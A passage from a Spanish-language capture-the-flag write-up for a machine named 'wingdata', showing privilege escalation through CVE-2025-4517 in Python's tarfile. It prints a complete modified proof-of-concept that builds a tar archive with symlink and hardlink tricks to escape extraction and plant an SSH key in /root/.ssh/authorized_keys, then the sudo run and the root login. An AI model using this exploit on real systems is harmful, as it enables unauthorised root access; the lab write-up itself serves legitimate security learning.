</span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="ch">#!/usr/bin/env python3</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">tarfile</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">sys</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">re</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">argparse</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">BACKUP_BASE_DIR</span> <span class="o">=</span> <span class="s2">&#34;/opt/backup_clients/backups&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">STAGING_BASE</span> <span class="o">=</span> <span class="s2">&#34;/opt/backup_clients/restored_backups&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">validate_backup_name</span><span class="p">(</span><span class="n">filename</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">re</span><span class="o">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s2">&#34;^backup_\d+\.tar$&#34;</span><span class="p">,</span> <span class="n">filename</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="kc">False</span> </span></span><span class="line"><span class="cl"> <span class="n">client_id</span> <span class="o">=</span> <span class="n">filename</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;_&#39;</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s1">&#39;.tar&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">client_id</span><span class="o">.</span><span class="n">isdigit</span><span class="p">()</span> <span class="ow">and</span> <span class="n">client_id</span> <span class="o">!=</span> <span class="s2">&#34;0&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">validate_restore_tag</span><span class="p">(</span><span class="n">tag</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nb">bool</span><span class="p">(</span><span class="n">re</span><span class="o">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s2">&#34;^[a-zA-Z0-9_]{1,24}$&#34;</span><span class="p">,</span> <span class="n">tag</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">parser</span> <span class="o">=</span> <span class="n">argparse</span><span class="o">.</span><span class="n">ArgumentParser</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="n">description</span><span class="o">=</span><span class="s2">&#34;Restore client configuration from a validated backup tarball.&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">epilog</span><span class="o">=</span><span class="s2">&#34;Example: sudo </span><span class="si">%(prog)s</span><span class="s2"> -b backup_1001.tar -r restore_john&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;-b&#34;</span><span class="p">,</span> <span class="s2">&#34;--backup&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">required</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">help</span><span class="o">=</span><span class="s2">&#34;Backup filename (must be in /home/wacky/backup_clients/ and match backup_&lt;client_id&gt;.tar, &#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;where &lt;client_id&gt; is a positive integer, e.g., backup_1001.tar)&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;-r&#34;</span><span class="p">,</span> <span class="s2">&#34;--restore-dir&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">required</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">help</span><span class="o">=</span><span class="s2">&#34;Staging directory name for the restore operation. &#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Must follow the format: restore_&lt;client_user&gt; (e.g., restore_john). &#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Only alphanumeric characters and underscores are allowed in the &lt;client_user&gt; part (1–24 characters).&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="o">.</span><span class="n">parse_args</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">validate_backup_name</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">backup</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;[!] Invalid backup name. Expected format: backup_&lt;client_id&gt;.tar (e.g., backup_1001.tar)&#34;</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">backup_path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">BACKUP_BASE_DIR</span><span class="p">,</span> <span class="n">args</span><span class="o">.</span><span class="n">backup</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">isfile</span><span class="p">(</span><span class="n">backup_path</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[!] Backup file not found: </span><span class="si">{</span><span class="n">backup_path</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">args</span><span class="o">.</span><span class="n">restore_dir</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s2">&#34;restore_&#34;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;[!] --restore-dir must start with &#39;restore_&#39;&#34;</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">tag</span> <span class="o">=</span> <span class="n">args</span><span class="o">.</span><span class="n">restore_dir</span><span class="p">[</span><span class="mi">8</span><span class="p">:]</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">tag</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;[!] --restore-dir must include a non-empty tag after &#39;restore_&#39;&#34;</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">validate_restore_tag</span><span class="p">(</span><span class="n">tag</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;[!] Restore tag must be 1–24 characters long and contain only letters, digits, or underscores&#34;</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">staging_dir</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">STAGING_BASE</span><span class="p">,</span> <span class="n">args</span><span class="o">.</span><span class="n">restore_dir</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[+] Backup: </span><span class="si">{</span><span class="n">args</span><span class="o">.</span><span class="n">backup</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[+] Staging directory: </span><span class="si">{</span><span class="n">staging_dir</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">os</span><span class="o">.</span><span class="n">makedirs</span><span class="p">(</span><span class="n">staging_dir</span><span class="p">,</span> <span class="n">exist_ok</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="n">tarfile</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">backup_path</span><span class="p">,</span> <span class="s2">&#34;r&#34;</span><span class="p">)</span> <span class="k">as</span> <span class="n">tar</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">tar</span><span class="o">.</span><span class="n">extractall</span><span class="p">(</span><span class="n">path</span><span class="o">=</span><span class="n">staging_dir</span><span class="p">,</span> <span class="nb">filter</span><span class="o">=</span><span class="s2">&#34;data&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[+] Extraction completed in </span><span class="si">{</span><span class="n">staging_dir</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span> <span class="p">(</span><span class="n">tarfile</span><span class="o">.</span><span class="n">TarError</span><span class="p">,</span> <span class="ne">OSError</span><span class="p">,</span> <span class="ne">Exception</span><span class="p">)</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[!] Error during extraction: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><p>El usuario tiene acceso a ambos directorios, backups y restored_backups.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">wacky@wingdata:~$ ls -ld /opt/backup_clients/restored_backups </span></span><span class="line"><span class="cl">drwxr-x--- <span class="m">2</span> root wacky <span class="m">4096</span> Jan <span class="m">12</span> 08:43 /opt/backup_clients/restored_backups </span></span><span class="line"><span class="cl">wacky@wingdata:~$ ls -ld /opt/backup_clients/backups </span></span><span class="line"><span class="cl">drwxrwx--- <span class="m">2</span> root wacky <span class="m">4096</span> Jan <span class="m">12</span> 08:32 /opt/backup_clients/backups </span></span><span class="line"><span class="cl">wacky@wingdata:~$ </span></span></code></pre></td></tr></table> </div> </div><h2 id="cve-2025-4517">CVE-2025-4517</h2> <p>Encontramos el <a href="https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f">CVE-2025-4517</a> que afecta a la version de Python de la maquina, esta permite escribir/crear archivos a traves de enlaces simbolicos (symlink) en un archivo <code>tar</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">wacky@wingdata:~$ python3 --version </span></span><span class="line"><span class="cl">Python 3.12.3 </span></span><span class="line"><span class="cl">wacky@wingdata:~$ </span></span></code></pre></td></tr></table> </div> </div><p>Vemos el uso de <code>tar.extractall</code> en el script.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="ch">#!/usr/bin/env python3</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">tarfile</span> </span></span><span class="line"><span class="cl"><span class="c1"># ... cut ...</span> </span></span><span class="line"><span class="cl"><span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="n">tarfile</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">backup_path</span><span class="p">,</span> <span class="s2">&#34;r&#34;</span><span class="p">)</span> <span class="k">as</span> <span class="n">tar</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">tar</span><span class="o">.</span><span class="n">extractall</span><span class="p">(</span><span class="n">path</span><span class="o">=</span><span class="n">staging_dir</span><span class="p">,</span> <span class="nb">filter</span><span class="o">=</span><span class="s2">&#34;data&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="c1"># .. cut ..</span> </span></span></code></pre></td></tr></table> </div> </div><p>Modificamos el <a href="https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f">PoC</a> para realizar la escritura de nuestra clave publica en el directorio <code>/root</code> en el archivo <code>.ssh/authorized_keys</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">import tarfile </span></span><span class="line"><span class="cl">import os </span></span><span class="line"><span class="cl">import io </span></span><span class="line"><span class="cl">import sys </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">comp</span> <span class="o">=</span> <span class="s1">&#39;d&#39;</span> * <span class="m">247</span> </span></span><span class="line"><span class="cl"><span class="nv">steps</span> <span class="o">=</span> <span class="s2">&#34;abcdefghijklmnop&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">path</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl">with tarfile.open<span class="o">(</span><span class="s2">&#34;/opt/backup_clients/backups/backup_1001.tar&#34;</span>, <span class="nv">mode</span><span class="o">=</span><span class="s2">&#34;x&#34;</span><span class="o">)</span> as tar: </span></span><span class="line"><span class="cl"> <span class="c1"># populate the symlinks and dirs that expand in os.path.realpath()</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> i in steps: </span></span><span class="line"><span class="cl"> <span class="nv">a</span> <span class="o">=</span> tarfile.TarInfo<span class="o">(</span>os.path.join<span class="o">(</span>path, comp<span class="o">))</span> </span></span><span class="line"><span class="cl"> a.type <span class="o">=</span> tarfile.DIRTYPE </span></span><span class="line"><span class="cl"> tar.addfile<span class="o">(</span>a<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="nv">b</span> <span class="o">=</span> tarfile.TarInfo<span class="o">(</span>os.path.join<span class="o">(</span>path, i<span class="o">))</span> </span></span><span class="line"><span class="cl"> b.type <span class="o">=</span> tarfile.SYMTYPE </span></span><span class="line"><span class="cl"> b.linkname <span class="o">=</span> comp </span></span><span class="line"><span class="cl"> tar.addfile<span class="o">(</span>b<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="nv">path</span> <span class="o">=</span> os.path.join<span class="o">(</span>path, comp<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="c1"># create the final symlink that exceeds PATH_MAX and simply points to the</span> </span></span><span class="line"><span class="cl"> <span class="c1"># top dir. this allows *any* path to be appended.</span> </span></span><span class="line"><span class="cl"> <span class="c1"># this link will never be expanded by os.path.realpath(), nor anything after it.</span> </span></span><span class="line"><span class="cl"> <span class="nv">linkpath</span> <span class="o">=</span> os.path.join<span class="o">(</span><span class="s2">&#34;/&#34;</span>.join<span class="o">(</span>steps<span class="o">)</span>, <span class="s2">&#34;l&#34;</span>*254<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="nv">l</span> <span class="o">=</span> tarfile.TarInfo<span class="o">(</span>linkpath<span class="o">)</span> </span></span><span class="line"><span class="cl"> l.type <span class="o">=</span> tarfile.SYMTYPE </span></span><span class="line"><span class="cl"> l.linkname <span class="o">=</span> <span class="o">(</span><span class="s2">&#34;../&#34;</span> * len<span class="o">(</span>steps<span class="o">))</span> </span></span><span class="line"><span class="cl"> tar.addfile<span class="o">(</span>l<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1"># make a symlink outside to keep the tar command happy</span> </span></span><span class="line"><span class="cl"> <span class="nv">e</span> <span class="o">=</span> tarfile.TarInfo<span class="o">(</span><span class="s2">&#34;escape&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> e.type <span class="o">=</span> tarfile.SYMTYPE </span></span><span class="line"><span class="cl"> e.linkname <span class="o">=</span> linkpath + <span class="s2">&#34;/../../../../../../root&#34;</span> </span></span><span class="line"><span class="cl"> tar.addfile<span class="o">(</span>e<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1"># use the symlinks above, that are not checked, to create a hardlink</span> </span></span><span class="line"><span class="cl"> <span class="c1"># to a file outside of the destination path</span> </span></span><span class="line"><span class="cl"> <span class="nv">f</span> <span class="o">=</span> tarfile.TarInfo<span class="o">(</span><span class="s2">&#34;flaglink&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> f.type <span class="o">=</span> tarfile.LNKTYPE </span></span><span class="line"><span class="cl"> f.linkname <span class="o">=</span> <span class="s2">&#34;escape/.ssh&#34;</span> </span></span><span class="line"><span class="cl"> tar.addfile<span class="o">(</span>f<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1"># now that we have the hardlink we can overwrite the file</span> </span></span><span class="line"><span class="cl"> with open<span class="o">(</span><span class="s2">&#34;/home/wacky/.ssh/id_rsa.pub&#34;</span>, <span class="s2">&#34;rb&#34;</span><span class="o">)</span> as f: </span></span><span class="line"><span class="cl"> <span class="nv">pub_key</span> <span class="o">=</span> f.read<span class="o">()</span>.strip<span class="o">()</span> + b<span class="s2">&#34;\n&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nv">c</span> <span class="o">=</span> tarfile.TarInfo<span class="o">(</span><span class="s2">&#34;escape/.ssh/authorized_keys&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> c.type <span class="o">=</span> tarfile.REGTYPE </span></span><span class="line"><span class="cl"> c.size <span class="o">=</span> len<span class="o">(</span>pub_key<span class="o">)</span> </span></span><span class="line"><span class="cl"> tar.addfile<span class="o">(</span>c, <span class="nv">fileobj</span><span class="o">=</span>io.BytesIO<span class="o">(</span>pub_key<span class="o">))</span> </span></span></code></pre></td></tr></table> </div> </div><p>Generamos una clave ssh para wacky.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># generate ssh key for wacky</span> </span></span><span class="line"><span class="cl">wacky@wingdata:~$ ssh-keygen </span></span><span class="line"><span class="cl">Generating public/private rsa key pair. </span></span><span class="line"><span class="cl">Enter file in which to save the key <span class="o">(</span>/home/wacky/.ssh/id_rsa<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter passphrase <span class="o">(</span>empty <span class="k">for</span> no passphrase<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter same passphrase again: </span></span><span class="line"><span class="cl">Your identification has been saved in /home/wacky/.ssh/id_rsa </span></span><span class="line"><span class="cl">Your public key has been saved in /home/wacky/.ssh/id_rsa.pub </span></span><span class="line"><span class="cl">The key fingerprint is: </span></span><span class="line"><span class="cl">SHA256:ZUHF1CDzoDzS63mBQb2eW5N2JJdlnDhQ7X4wTh1Y4HE wacky@wingdata </span></span><span class="line"><span class="cl">The key<span class="err">&#39;</span>s randomart image is: </span></span><span class="line"><span class="cl">+---<span class="o">[</span>RSA 3072<span class="o">]</span>----+ </span></span><span class="line"><span class="cl"><span class="p">|</span> .o*<span class="o">=</span>***E.<span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> + ..*o++++<span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> . * o...o<span class="o">=</span>.<span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> . B. . B..<span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> S... B.o <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> . .o.<span class="o">=</span> o..<span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> o .+ o .<span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> .. <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl">+----<span class="o">[</span>SHA256<span class="o">]</span>-----+ </span></span><span class="line"><span class="cl">wacky@wingdata:~$ </span></span></code></pre></td></tr></table> </div> </div><p>Tras ejecutar el exploit este crearia el archivo <code>backup_1001.tar</code>. Ejecutamos el script especificando el archivo tar.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">wacky@wingdata:~$ python3 /tmp/exploit.py </span></span><span class="line"><span class="cl">wacky@wingdata:~$ sudo python3 /opt/backup_clients/restore_backup_clients.py -b backup_1001.tar -r restore_root </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Backup: backup_1001.tar </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Staging directory: /opt/backup_clients/restored_backups/restore_root </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Extraction completed in /opt/backup_clients/restored_backups/restore_root </span></span><span class="line"><span class="cl">wacky@wingdata:~$ </span></span></code></pre></td></tr></table> </div> </div><p>Con ello se agregaria nuestra clave publica a <code>/root/.ssh/authorized_keys</code>. Ejecutamos ssh para root logrando el acceso a este usuario y la flag <code>root.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">wacky@wingdata:~$ ssh root@localhost </span></span><span class="line"><span class="cl">Linux wingdata 6.1.0-42-amd64 <span class="c1">#1 SMP PREEMPT_DYNAMIC Debian 6.1.159-1 (2025-12-30) x86_64</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The programs included with the Debian GNU/Linux system are free software<span class="p">;</span> </span></span><span class="line"><span class="cl">the exact distribution terms <span class="k">for</span> each program are described in the </span></span><span class="line"><span class="cl">individual files in /usr/share/doc/*/copyright. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent </span></span><span class="line"><span class="cl">permitted by applicable law. </span></span><span class="line"><span class="cl">Last login: Sat Feb <span class="m">14</span> 19:22:20 <span class="m">2026</span> from ::1 </span></span><span class="line"><span class="cl">root@wingdata:~# whoami<span class="p">;</span>id<span class="p">;</span><span class="nb">pwd</span> 